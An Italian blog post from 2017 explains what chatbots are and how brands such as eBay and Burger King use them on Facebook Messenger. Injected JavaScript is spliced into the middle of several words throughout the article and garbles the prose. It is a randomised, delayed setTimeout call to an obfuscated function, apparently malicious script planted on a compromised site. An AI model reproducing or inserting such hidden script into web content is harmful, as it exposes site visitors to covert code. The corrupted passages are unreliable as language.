Da non perdere!

#BotPower: il potere dei ChatBot

Pubblicato il 2 ottobre 2017
Condividi

BotPower il potere dei Bot nelle chat

La rivoluzione dei Bot

Il termine bot deriva da robot e viene utilizzato da molto tempo per indicare un’automazione informatica. Il bot era un programma che svolgeva determinate funzioni in modo ripetitivo. O ancora era in grado di avviare una serie di operazioni premendo un solo pulsante.

Oggi questi bot hanno diversi tipi di attivatori e producono diverse risposte. Infatti stanno velocemente entrandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando a far parte del mercato B2C (Business to Consumer) grazie all’abitudine che recentemente ha accomunato 3 miliardi di utenti giornalieri: chattare.

facebook messenger e la rivoluzione dei chatbot

E in particolare gioca un ruolo fondamentale in questa innovazione l’ormai sempre più grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande colosso Facebook, che nel 2016 è cresciuta tantissimo.

Cosa sono i ChatBot?

I chatbot sono dei piccoli programmi di risposta inseriti all’interno di una chat. In questo modo i cosiddetti chatterbot sono in grado di simulare una conversazione con un utente già da diversi anni.

Oggi però si stanno evolvendo, diventandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando sempre più realistici nelle risposte, includendo emoticon e utilizzandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando anche lo slang scritto tipico della generazione web. Ma soprattutto stanno diventandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando un ottimo canale di comunicazione tra l’utente e l’azienda che li usa.

Ultimo esempio lo ShopBot di Ebay: scrivigli “Ciao” su Messenger e inizierà l’innovativa esperienza d’acquisto. Con poche e semplici domandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande lo ShopBot ti indirizzerà al prodotto o prodotti più adatti alle tue esigenze, espresse poco prima in chat.

Questa è solo una delle più ovvie applicazioni, ma il potenziale dei Bot va dal TrackBot che traccia il tuo pacco a prescindere dalla compagnia che lo spedisce, al BurgerKingBot per ordinare a distanza ciò che vuoi mangiare.

E tu hai già provato a chattare con un bot? Lasciaci la tua esperienza nei commenti!

 

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *